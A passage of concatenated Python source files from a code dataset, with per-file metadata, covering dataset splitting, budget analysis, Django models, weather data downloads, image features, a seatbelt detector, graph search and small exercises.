train.\n trainval data : test data = 5:1\n :param path:\n :return:\n '''\n scale = 3\n image_dir = os.path.join(path, 'JPEGImages')\n anno_dir = os.path.join(path, 'Annotations')\n ImageSets_path = os.path.join(path, 'ImageSets')\n main_dir = os.path.join(ImageSets_path, 'Main')\n\n mkdir(main_dir)\n\n imgs = os.listdir(image_dir)\n random.shuffle(imgs)\n\n trainval_test_images = []\n trainval_images = []\n test_images = []\n\n for i in range(len(imgs)):\n s = imgs[i]\n trainval_test_images.append(s.split('.')[0] + '\\n')\n\n for i in range(len(imgs)//scale, len(imgs)):\n s = imgs[i]\n trainval_images.append(s.split('.')[0] + '\\n')\n\n for i in range(len(imgs)//scale):\n s = imgs[i]\n test_images.append(s.split('.')[0] + '\\n')\n\n with open(main_dir+'/trainval_test.txt','w+') as f:\n f.writelines(trainval_test_images)\n print(\"{}, numbers:{}\".format(main_dir + '/trainval_test.txt', len(trainval_test_images)))\n\n with open(main_dir+'/trainval.txt','w+') as f:\n f.writelines(trainval_images)\n print(\"{}, numbers:{}\".format(main_dir + '/trainval.txt', len(trainval_images)))\n with open(main_dir+'/test.txt','w+') as f:\n f.writelines(test_images)\n print(\"{}, numbers:{}\".format(main_dir + '/test.txt', len(test_images)))\n\n print('total: {}'.format(len(imgs)))\n print('step: {}'.format(len(trainval_images)//2+1))\n\ndef create_sub_Main(dirs):\n data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n for data_dir in data_paths:\n _create_Main(data_dir)\n\ndef create_subs_Main(data_paths):\n # dirs = ['data/train_data-2018-3-7', 'data/train_data-2018-3-16']\n # data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n for data_dir in data_paths:\n _create_Main(data_dir)\n\ndef create_txt(data_dir):\n _create_Main(data_dir)\n\ndef create_txts(data_dirs):\n for data_dir in data_dirs:\n _create_Main(data_dir)\n\n# if __name__ == \"__main__\":\n# dirs = ['data_52/train_data-2018-04-18']\n# data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n# create_subs_Main(data_paths)\n\nparser = argparse.ArgumentParser(description='Get the data info')\n# parser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/train_data/data/all_train_data')\n# parser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/train_data/test')\nparser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/tf-faster-rcnn/data/train_data/train_data-2018-04-02')\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n # data_dir = '/home/syh/disk/train/all_train_data'\n\n data_dir = args.datadir\n # data_dir = '/home/syh/all_train_data'\n create_txt(data_dir)\n\n\"\"\"\ncd ~/RetinaNet/data_processing\npython create_Main.py -d /home/syh/train_data/data/sub_train_data/train_data-2018-05-11\n\"\"\"","sub_path":"data_processing/create_Main.py","file_name":"create_Main.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"253021988","text":"#PyBank\nimport os\nimport csv\n\ncsvpath = os.path.join('budget_data.csv')\n\n#create lists\nmonths = []\nprofit_loss = []\nmom_dif = []\n\nwith open(csvpath, newline='') as csvfile:\n\n #specify delimiter and variable that holds\n csvreader = csv.reader(csvfile, delimiter=',')\n\n #skip header row\n csv_header = next(csvreader)\n\n #read rows after header\n for row in csvreader:\n\n #append list with months\n months.append(row[0])\n\n #calculate number of months\n num_months = len(months)\n\n #append list with PnL data\n profit_loss.append(float(row[1]))\n\n #calculate net total of PnL\n net_total = sum(profit_loss)\n\n \n \n #calculate MoM difference in PnL\n for i in range(1, len(profit_loss)):\n\n #append list to hold data\n mom_dif.append((profit_loss[i]) - (profit_loss[i-1]))\n\n #calculate average of list\n avg_mom_dif = round(sum(mom_dif) / len(mom_dif), 2)\n\n #find max MoM change\n max_mom_dif = max(mom_dif)\n\n #find min MoM change\n min_mom_dif = min(mom_dif)\n\n #find max date\n max_mom_dif_date = str(months[mom_dif.index(max(mom_dif)) + 1])\n\n #find min date\n min_mom_dif_date = str(months[mom_dif.index(min(mom_dif)) + 1])\n\n with open(\"PyBank_Analysis.txt\", \"w\") as text_file:\n\n #print analysis to txt file\n print(\"Financial Analysis\", file=text_file)\n print(\"---------------------------------\", file=text_file)\n print(f\"Total Months: {num_months}\", file=text_file)\n print(f\"Total: ${net_total}\", file=text_file)\n print(f\"Average Change: ${avg_mom_dif}\", file=text_file)\n print(f\"Greatest Increase in Profits: {max_mom_dif_date} (${max_mom_dif})\", file=text_file)\n print(f\"Greatest Decrease in Profits: {min_mom_dif_date} (${min_mom_dif})\", file=text_file)\n\nprint(open('PyBank_Analysis.txt').read())","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520560038","text":"from __future__ import unicode_literals\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\nfrom application import settings\n\n\nclass User(AbstractUser):\n\n pass\n\n\nclass Authored(models.Model):\n author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name='Author')\n\n class Meta:\n abstract = True\n\n\nclass Titled(models.Model):\n title = models.CharField(max_length=255, verbose_name='Title')\n\n def get_title(self):\n return self.title\n\n class Meta:\n abstract = True\n\n\nclass Dated(models.Model):\n created = models.DateTimeField(auto_now_add=True, verbose_name='Created')\n updated = models.DateTimeField(auto_now=True, verbose_name='Updated')\n\n class Meta:\n abstract = True\n\n\nclass Deletable(models.Model):\n is_deleted = models.BooleanField(default=False, verbose_name='Is deleted')\n\n class Meta:\n abstract = True\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"215958576","text":"##########import module#################\nfrom ecmwfapi import ECMWFDataServer\nfrom calendar import monthrange\nimport numpy as np\nfrom retrieve import retrieve\n########################################\n########################################\ninitial_year=2015 \ninitial_month=9 #Could change these variables to define the period\nend_year=2015 #leap year problem has been taken care of in this script already. \nend_month=9 #Can download only one month data or a long period of data\n########################################\nyear_loop=np.arange(initial_year,end_year+1)#could type help(np.arange) in python prompt to see the syntax of this function for +1\nfor year in year_loop:\n if (year!=year_loop[0]) & (year!=year_loop[-1]):\n month_loop=np.arange(1,12+1)\n elif (year== year_loop[0]) & (year==year_loop[-1]):\n month_loop=np.arange(initial_month,end_month+1)\n elif year==year_loop[-1]:\n month_loop=np.arange(1,end_month+1)\n else:\n month_loop=np.arange(initial_month,12+1)\n\n for month in month_loop:\n max_day=list(monthrange(year,month))[1]\n if month<10:\n date_string=str(year)+\"-0\"+str(month)+\"-01/to/\"+str(year)+\"-0\"+str(month)+\"-\"+str(max_day)\n target=str(year)+'0'+str(month)+\"PV_RTW.nc\" #target is just the name of the file.Change it depending on the parameters you choose in retrieve.py\n retrieve(date_string,target) #PV is potential vorticity, R relative humidity\n else: #T temperature and w vertical velocity \n date_string=str(year)+\"-\"+str(month)+\"-01/to/\"+str(year)+\"-\"+str(month)+\"-\"+str(max_day)\n target=str(year)+str(month)+\"PV_RTW.nc\"\n retrieve(date_string,target)\n","sub_path":"ecwmf/era_interim.py","file_name":"era_interim.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"593351542","text":"\r\n\r\nfrom Vehicle import Vehicle\r\nfrom Order import Order\r\n\r\nimport numpy as np\r\nimport pickle\r\nclass AbstractWorld:\r\n\t\r\n\tdef __init__(self):\r\n\t\t\r\n\t\t[VF,EF] = pickle.load(open(\"./Classes/data/Lehigh.pickle\",'rb'))\r\n\t\tself.Edges=[] \r\n\t\tfor edge in EF:\r\n\t\t\tself.Edges.append( [ edge[0] , edge[1] ,EF[edge][0 ],EF[edge][1 ],EF[edge][2 ] ])\t\t\t\r\n \r\n\t\t\r\n\t\tself.Verticies=[]\r\n\t\tfor v in VF:\r\n\t\t\tself.Verticies.append( [ v,float(VF[v][0]),float(VF[v][1])] )\t\t\t\r\n\t\t \r\n\t\t\r\n\t\tself.v = [v[0] for v in self.Verticies]\r\n\t\t\r\n\t\tself.vShuffled=[v[0] for v in self.Verticies]\r\n\t\tnp.random.seed(47)\r\n\t\tnp.random.shuffle(self.vShuffled)\r\n\t\t\r\n\t\tself.orderId = 0\r\n\t\tself.map = {\"L1\":[\"A\",\"B\"],\"L2\":[\"C\",\"D\"],\"L3\":[\"E\",\"F\"],\"L4\":[\"G\",\"H\"]}\r\n\t\t\r\n\tdef getLocationOfWarehouses(self):\t\r\n\t\ttypes = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\"]\r\n\t\tWarehouses = []\r\n\t\tj = 0\r\n\t\tfor t in types:\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tWarehouses.append({\"type\":t,\"location\":self.vShuffled[j]})\r\n\t\t\t\tj+=1\r\n\t\t\r\n\t\treturn Warehouses\r\n\t\t\r\n\tdef getProductionLines(self):\t\r\n\t\ttypes = [\"L1\",\"L2\",\"L3\",\"L4\"]\r\n\t\tProductionLines = []\r\n\t\tj = 20\r\n\t\tfor t in types:\r\n\t\t\tfor k in range(5):\r\n\t\t\t\tProductionLines.append({\r\n\t\t\t\t\"type\":t,\r\n\t\t\t\t\"location\":self.vShuffled[j],\r\n\t\t\t\t\"capacityOfMaterial[tons]\":100})\r\n\t\t\t\tj+=1\r\n\t\t\r\n\t\treturn ProductionLines\r\n\t\t\r\n\tdef getInitialTruckLocations(self):\r\n\t\tnp.random.seed(47)\r\n\t\tvehicles = []\r\n\t\tnp.random.shuffle(self.v)\r\n\t\r\n\t\tfor i, v in enumerate(self.v):\r\n\t\t\tif i%3 == 0:\r\n\t\t\t\tnewVehicle = Vehicle(i,v)\r\n\t\t\t\tnewVehicle.type=\"Truck\"\r\n\t\t\t\tnewVehicle.capacity = np.random.randint(3,30)\r\n\t\t\t\tvehicles.append(newVehicle)\r\n\t\treturn vehicles\r\n\t\t\r\n\tdef getNewOrdersForGivenTime(self,t):\r\n\t\tnewOrders=[]\r\n\t\tnp.random.seed(t)\r\n\t\tif t > 22*60:\r\n\t\t\treturn newOrders\r\n\t\tif np.random.rand() < 0.3:\r\n\t\t\tn = np.random.randint(1,3)\r\n\t\t\tnp.random.shuffle(self.v)\r\n\t\t\tfor j in xrange(n):\r\n\t\t\t\torder = Order(self.orderId)\r\n\t\t\t\torder.finalLocation=np.random.choice(self.vShuffled[40:])\r\n\t\t\t\t\r\n\t\t\t\tl = [e for e in self.map]\r\n\t\t\t\tnp.random.shuffle(l)\r\n\r\n\t\t\t\tfor j in l[0:np.random.randint(2,4)]:\r\n\t\t\t\t\torder.productionProcess.append({\r\n\t\t\t\t\t\t\"processinLine\":j,\r\n\t\t\t\t\t\t\"resourceNeeded\":np.random.choice(self.map[j]),\r\n\t\t\t\t\t\t\"processingTime\":np.random.randint(5,10),\r\n\t\t\t\t\t\t\"materialNeeded[tons]\":np.random.randint(2,10),\t\t\t\t\t\t\r\n\t\t\t\t\t\t})\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t \r\n\t\t\t\tself.orderId+=1\r\n\t\t\t\tnewOrders.append(order)\r\n\t\treturn newOrders\r\n\t\t \r\n\r\n","sub_path":"AbstractWorld.py","file_name":"AbstractWorld.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"109768746","text":"import chardet\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n#import cookielib\n\nurl = 'http://www.cdlr.gov.cn/detailnoright.aspx?id=96813'\nreferer = 'http://www.cdlr.gov.cn/detailnoright.aspx?id=96813'\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/603.1.13 (KHTML, like Gecko) Version/10.1 Safari/603.1.13'\nheaders = {'User-Agent':user_agent,'Referer':referer}\n#headers = {'User-Agent':user_agent}\nhtml = requests.get(url,headers=headers)\n#print(html.text)\n#print(response.headers)\nhtml.encoding = chardet.detect(html.content)['encoding']\n\nsoup = BeautifulSoup(html.text,'lxml' )\n#print(soup.title.string)\n#print(soup.title.string)\n#for a in soup.find_all(class_ = \"\n# print(repr(a))\n#print('nextsibing:%s'%soup.title.next_sibling)\n#for tag in soup.find_all(True):\n# print(tag.name)\n#print(soup.span.string)\na = soup.find_all(\"span\")\nfor i in a:\n print(i)\n","sub_path":"urllib/local_request.py","file_name":"local_request.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"84576587","text":"\"\"\"\r\nVytvari Gabor priznak.\r\n\r\n@author: Katerina Kratochvilova\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom skimage.filter import gabor_kernel #skimage.__version__ if it's lower than 0.11 then use filter instead of filters\r\nfrom skimage.filter import gabor_filter # gabor in newer versions\r\nfrom skimage import io\r\nimport skimage\r\nimport math\r\nimport cv2\r\nfrom scipy import ndimage as ndi\r\n\r\n#parametry Gabor funkce\r\norientations = [0, math.pi/4, math.pi/2, math.pi / 4 * 3]\r\nwavelengths = [0.25, 0.5, 1.0] #[2.0, 2.0 * math.sqrt(2), 4.0] #[4, 4.0 * math.sqrt(2), 8, 8 * math.sqrt(2) ]\r\nsigma = 1\r\n\r\ndef create_kernels():\r\n \"\"\"\r\n Vytvari kernely (filtry) podle zadanych parametru.\r\n \r\n Return: \r\n kernels -- vytvorene kernely (filtry).\r\n \"\"\"\r\n #print skimage.__version__\r\n kernels = []\r\n \r\n for theta in orientations:\r\n #print \"Theta: \", theta\r\n for lambd in wavelengths:\r\n kernel = gabor_kernel(1.0/lambd, theta=theta, sigma_x=sigma, sigma_y=sigma) # frequency is 1/lambda\r\n kernels.append(kernel)\r\n \r\n #print kernel.shape\r\n #print kernel\r\n \r\n #io.imshow(np.real(kernel))\r\n #io.imshow(np.imag(kernel))\r\n #io.imshow(io.concatenate_images([np.real(kernel), np.imag(kernel)])) \r\n #io.show() \r\n \r\n \r\n return kernels \r\n \r\n\r\ndef show_kernels(kernels, real=True): #if False - show imaginary part\r\n \"\"\"\r\n Zobrazi kernely. \r\n \r\n Keyword arguments:\r\n kernels -- kernely.\r\n real -- jaka cast se ma zobrazit, pouze realne kernely nabo imaginarni kernely.\r\n \"\"\"\r\n k_size = kernels[0].shape[0]\r\n img = np.zeros((k_size * len(wavelengths), k_size * len(orientations)))\r\n \r\n #print img.shape\r\n for i in range(len(kernels)):\r\n if real:\r\n k = np.real(kernels[i])\r\n else:\r\n k = np.imag(kernels[i])\r\n n = np.linalg.norm(k) # for normalization\r\n #print \"Norm:\", n\r\n r = i % len(wavelengths)\r\n c = i / len(wavelengths)\r\n img[r * k_size : r*k_size + k_size, c*k_size : c*k_size + k_size] = k / n\r\n \r\n io.imshow(img)\r\n io.show()\r\n \r\ndef process_image(img):\r\n \"\"\"\r\n Pouzije filtry na obrazek.\r\n \r\n Keyword arguments:\r\n img -- vstupni obrazek.\r\n Return:\r\n responses -- vysledna matice po pouzitych filtrech. \r\n \"\"\"\r\n responses = []\r\n \r\n for theta in orientations:\r\n for lambd in wavelengths:\r\n real, imag = gabor_filter(img, 1.0/lambd, theta=theta, sigma_x=sigma, sigma_y=sigma, mode='reflect') # frequency is 1/lambda\r\n responses.append((real, imag))\r\n \r\n #or use ndi.convolve(img, kernel, mode='wrap')\r\n \r\n #print len(responses)\r\n \r\n return responses\r\n\r\n\r\ndef count_magnitude(filtered_img_real, filtered_img_imag):\r\n \"\"\"\r\n Spocita magnitudu.\r\n filtered_img_real -- preklopi na osu x, filtered_img_imag preklopi na osu y tim padem mame vektory a spocitame jejich velikost.\r\n \r\n Keyword arguments:\r\n filtered_img_real -- filtrovane obrazky realna cast. \r\n filtered_img_imag -- filtrovane obrazky imaginarni cast.\r\n Return:\r\n magnitude -- vypoctena magnituda.\r\n \"\"\"\r\n magnitude = []\r\n \r\n for i in range(len(filtered_img_real)):\r\n magnitude.append(cv2.magnitude(filtered_img_real[i], filtered_img_imag[i]))\r\n \r\n return magnitude\r\n\r\ndef count_vector(magnitudes, deep): \r\n \"\"\"\r\n Nasklada vektory za sebe.\r\n \r\n Keyword arguments:\r\n phase -- faze. \r\n deep -- velikost vektrou.\r\n Return:\r\n array_histograms_magnitude -- vypocteny vektor.\r\n \"\"\"\r\n\r\n array_histograms_magnitude = np.zeros(shape=(deep*len(magnitudes)), dtype=np.int)\r\n\r\n for i in range(len(magnitudes)): \r\n for x in range(len(magnitudes[i])):\r\n for y in range(len(magnitudes[i][x])):\r\n value = magnitudes[i].item(x,y) \r\n index = ((i*deep))+int((value/deep)) # (i*deep) potrebuju se posunout na i-ty filtrovany obrazek\r\n array_histograms_magnitude[index]=array_histograms_magnitude[index]+1\r\n return array_histograms_magnitude\r\n\r\ndef count_gabor(img): \r\n \"\"\"\r\n Hlavni metoda pro vypocet gabor.\r\n \r\n Keyword arguments:\r\n img -- vstupni obrazek.\r\n Return:\r\n gabor_vector -- vytvoreny priznak.\r\n \"\"\"\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n kernels = create_kernels()\r\n img = img.astype(float)\r\n #show_kernels(kernels, real=True)\r\n\r\n responses = process_image(img)\r\n vector_deep = 16\r\n filtered_img_real = []\r\n filtered_img_imag = []\r\n \r\n for item in responses:\r\n filtered_img_real.append(item[0])\r\n filtered_img_imag.append(item[1])\r\n \r\n magnitude = count_magnitude(filtered_img_real, filtered_img_imag)\r\n gabor_vector = count_vector(magnitude, vector_deep)\r\n return gabor_vector\r\n #io.imshow(responses[11][0])\r\n #io.show()\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n","sub_path":"cd/src/deskriptors/gabor.py","file_name":"gabor.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347285988","text":"##21000348 Andre Seo\n## Procedural Journey of Chicken\n\nfrom cs1graphics import*\n\ncanvas = Canvas(1000, 300)\ncanvas.setBackgroundColor(\"light blue\")\ncanvas.setTitle(\"Journey of Chicken\")\ncanvas.wait()\n\n#Create the ground\ndef create_ground():\n ground = Rectangle(1000,100)\n ground.setFillColor(\"light green\")\n ground.move(500,250)\n canvas.add(ground)\n\n#Create the sun\ndef create_sun():\n sun = Circle(50)\n sun.setFillColor(\"red\")\n sun.setBorderColor(\"red\")\n sun.move(25,25)\n canvas.add(sun)\n\n\n#Draw a chicken\ndef make_chicken(hen = False):\n layer = Layer()\n make_body(layer, hen)\n wing = make_wing(layer, hen)\n make_eye(layer, hen)\n make_beak(layer, hen)\n make_dots(layer, hen)\n return layer, wing\n\n\n######################################################\n\n\n#Make a body\ndef make_body(layer, hen = False):\n if hen:\n body = Ellipse(70, 80)\n body.setFillColor(\"white\")\n else:\n body = Ellipse(40, 50)\n body.setFillColor(\"yellow\")\n body.move(0,10)\n body.setBorderColor(\"yellow\")\n body.setDepth(20)\n layer.add(body)\n\n\n#Draw a wing\ndef make_wing(layer, hen = False):\n if hen:\n wing = Ellipse(60, 40)\n wing.setFillColor(\"white\")\n wing.setBorderColor(\"yellow\")\n wing.move(15,20)\n else:\n wing = Ellipse(30,20)\n wing.setFillColor(\"yellow\")\n wing.setBorderColor(\"orange\")\n wing.move(10,20)\n wing.adjustReference(-5, -5)\n wing.setDepth(19)\n layer.add(wing)\n return wing\n\n\n#Draw and eye\ndef make_eye(layer, hen = False):\n if hen:\n eye = Circle(3)\n eye.move(-15,-15)\n else:\n eye = Circle(2)\n eye.move(-5, 0)\n eye.setFillColor(\"black\")\n eye.setDepth(18)\n layer.add(eye)\n\n#Draw a beak\ndef make_beak(layer, hen = False):\n if hen:\n beak = Square(8)\n beak.move(-36, 0)\n else:\n beak = Square(4)\n beak.move(-22, 10)\n beak.rotate(45)\n beak.setFillColor(\"orange\")\n beak.setBorderColor(\"orange\")\n beak.setDepth(21)\n layer.add(beak)\n\n\n#Draw dots\ndef make_dots(layer, hen = False):\n if hen:\n head1 = Ellipse(5,8)\n head1.setFillColor(\"red\")\n head1.setBorderColor(\"red\")\n head1.move(600,158)\n head1.setDepth(22)\n layer.add(head1)\n\n head2 = Ellipse(5,8)\n head2.setFillColor(\"red\")\n head2.setBorderColor(\"red\")\n head2.move(594,458)\n head2.setDepth(22)\n layer.add(head2)\n\n######################################################\n\n \n#Draw the group\ndef make_group():##mother hen + baby chicken1\n group = Layer()\n mother_hen, wing = make_chicken(True)\n group.add(mother_hen)\n (chicken1, wing1) = make_chicken()\n chicken1.move(120, 0)\n group.add(chicken1)\n group.move(600,200)\n return group\n\n\ndef make_family():\n group = make_group()\n chicken2, wing2 = make_chicken()\n chicken2.move(800,200)\n canvas.add(group)\n canvas.add(chicken2)\n return group, chicken2, wing2\n\n\n#Create the scene\ndef create_scene():\n create_ground()\n create_sun()\n group, chicken2, wing2 = make_family()\n return group, chicken2, wing2\n\n\ndef move_group(group):\n for i in range(80):\n group.move(-5,-2)\n group.move(-5,2)\n if i == 30:\n text1 = Text(\"OH!\", 20)\n text1.move(800, 160)\n canvas.add(text1)\n elif i == 40:\n canvas.remove(text1)\n text2 = Text(\"WHERE IS MY MOMMY GOING?\", 30)\n text2.move(500, 110)\n canvas.add(text2)\n elif i == 55:\n canvas.remove(text2)\n\n\ndef move_chicken2(chicken2, wing2):\n for i in range(10):\n text3 = Text(\"Waif for ME~\", 25)\n text3.move(500, 110)\n canvas.add(text3)\n for k in range(5):\n chicken2.move(-10, -20)\n wing2.rotate(-10)\n for k in range(5):\n chicken2.move(-10, 20)\n wing2.rotate(10)\n\n\ndef animate_chicken_family():\n group, chicken2, wing2 = create_scene()\n move_group(group)\n move_chicken2(chicken2, wing2)\n\n\ndef main():\n animate_chicken_family()\n canvas.wait()\n canvas.close()\n\n\nmain()\n\n\n\n\n\n\n \n","sub_path":"Homework #12/1 PROCEDURAL_CHICKEN.py","file_name":"1 PROCEDURAL_CHICKEN.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"610586710","text":"import webbrowser\n\nclass Movie():\n \"\"\" This class provides a way to store movie related information\"\"\"\n \n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n \n def __init__(self, movieTitle, movieStoryline, posterImage, trailerYoutube):\n self.title = movieTitle\n self.storyline = movieStoryline\n self.poster_image_url = posterImage\n self.trailer_youtube_url = trailerYoutube\n\n def showTrailer(self):\n webbrowser.open(self.trailerYoutubeUrl)\n\n\n\n\n\n\n\n\n\n \n","sub_path":"Fundamentos de Programação/movies/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244015328","text":"import discord\n\nfrom ..objects.bot import Menel\n\n\ndef setup(bot: Menel):\n @bot.event\n async def on_raw_reaction_add(payload: discord.RawReactionActionEvent):\n if payload.user_id == bot.OWNER and payload.emoji.name == '🗑️':\n try:\n message = await (await bot.fetch_channel(payload.channel_id)).fetch_message(payload.message_id)\n if message.author == bot.user:\n await message.delete()\n except discord.HTTPException as e:\n print(e)","sub_path":"Menel/handlers/reaction_add.py","file_name":"reaction_add.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367476981","text":"import numpy as np\nimport cv2\nimport os\nimport time\nimport numpy as np\nfrom imutils import face_utils\nimport imutils\n\ndef increase_brightness(img, value=30):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv2.merge((h, s, v))\n img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return img\n\ndef main():\n net = cv2.dnn.readNet(\"YOLOFI2.weights\", \"YOLOFI.cfg\")\n cap = cv2.VideoCapture(\"test.mp4\")\n classes = []\n l = 1\n with open(\"obj.names\", \"r\")as f:\n classes = [line.strip() for line in f.readlines()]\n layers_names = net.getLayerNames()\n outputlayers = [layers_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n colors = np.random.uniform(0, 255, size=(len(classes), 3))\n font = cv2.FONT_HERSHEY_PLAIN\n frame_id = 0\n dd = -1\n time_now = time.time()\n frame_id = 0\n err = 0\n\n pred_corrects = []\n while True:\n _, frame = cap.read()\n frame_id += 1\n beltcornerdetected = False\n beltdetected = False\n if frame is None:\n break\n height, width, channels = frame.shape\n\n # # Type you code here\n frame = frame[:, 90:-50]\n frame = increase_brightness(frame, 10)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # frame = cv2.bilateralFilter(frame, d=-1, sigmaSpace=20, sigmaColor=5)\n clahe = cv2.createCLAHE(clipLimit=10.0, tileGridSize=(16,16))\n frame = clahe.apply(frame)\n frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)\n\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (480, 480), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n outs = net.forward(outputlayers)\n class_ids = []\n boxes = []\n shape = []\n confidence = 0\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n\n if confidence > 0.2:\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n if class_id == 1:\n beltcornerdetected = True\n elif class_id == 0:\n beltdetected = True\n\n # output whether prediction is correct\n print(frame_id)\n is_correct = 0\n if beltdetected and frame_id <= 125:\n is_correct = 1\n elif not beltdetected and frame_id > 125:\n is_correct = 1\n print(is_correct)\n pred_corrects.append(is_correct)\n # print(beltdetected)\n cv2.imshow(\"Image\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n print(\"Accuracy: {}\".format(sum(pred_corrects) / len(pred_corrects)))\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()","sub_path":"BeltDetectionLab2/BeltDetectionLab2.py","file_name":"BeltDetectionLab2.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9339376","text":"from collections import deque\n\n\ndef conv_list(n):\n adj_matrix = []\n for _ in range(n):\n adj_list = input().split()\n adj_list = list(map(int, adj_list))\n adj_row = [False] * n\n if adj_list[1] > 0:\n for i in adj_list[2:]:\n adj_row[i - 1] = True\n adj_matrix.append(adj_row)\n return adj_matrix\n\n\ndef depth_first_search(adj_matrix, n):\n visited = [None] * n\n count = 1\n searched = [None] * n\n start = 0\n stack = deque()\n stack.append(start)\n visited[start] = 1\n while count <= 2 * n:\n has_edge = adj_matrix[start]\n i = 0\n while i < n:\n if has_edge[i] and visited[i] is None:\n stack.append(i)\n count += 1\n visited[i] = count\n break\n i += 1\n if i < n:\n start = i\n else:\n searched_node = stack.pop()\n count += 1\n searched[searched_node] = count\n if len(stack) > 0:\n start = stack[-1]\n elif count < 2 * n:\n start = visited.index(None)\n stack.append(start)\n count += 1\n visited[start] = count\n else:\n break\n return visited, searched\n\n\ndef main():\n n = int(input())\n adj_matrix = conv_list(n)\n visited, searched = depth_first_search(adj_matrix, n)\n for i in range(n):\n print(\"{} {} {}\".format(i + 1, visited[i], searched[i]))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Python_codes/p02238/s659849161.py","file_name":"s659849161.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"123825058","text":"# 5494. 统计所有可行路径.py\nfrom functools import lru_cache\nfrom typing import List\n\n\nclass Solution:\n def countRoutes(self, locations: List[int], start: int,\n finish: int, fuel: int) -> int:\n mod = 10 ** 9 + 7\n begin, end = locations[start], locations[finish]\n if abs(begin - end) > fuel:\n return 0\n n = len(locations)\n\n @lru_cache(None)\n def dfs(i, j, pre):\n if pre == 0:\n if i == j:\n return 1\n return 0\n res = 0\n if i == j:\n res += 1\n for k in range(n):\n if k != i:\n need = abs(locations[i] - locations[k])\n if pre >= need:\n res += dfs(k, j, pre - need)\n return res\n\n return dfs(start, finish, fuel) % mod\n\n\ndef main():\n sol = Solution()\n res = sol.countRoutes([4, 3, 1], 1, 0, 6)\n print(res)\n res = sol.countRoutes([1, 2, 3], 0, 2, 40)\n print(res)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Week14/双周赛/5494. 统计所有可行路径.py","file_name":"5494. 统计所有可行路径.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383202199","text":"# general imports\nimport os\nimport sys\n\n# smartsim and smartredis imports\nfrom smartsim import Experiment\nfrom smartsim.settings import MpiexecSettings\nfrom smartsim.settings import MpirunSettings\n\n# Define function to parse node list\ndef parseNodeList(fname):\n with open(fname) as file:\n nodelist = file.readlines()\n nodelist = [line.rstrip() for line in nodelist]\n nodelist = [line.split('.')[0] for line in nodelist]\n nNodes = len(nodelist)\n return nodelist, nNodes\n\n# Parse command line arguments\nnodes = int(sys.argv[1])\nppn = int(sys.argv[2])\nsimprocs = int(sys.argv[3])\nsimprocs_pn = int(sys.argv[4])\ndbprocs_pn = int(sys.argv[5])\ndevice = 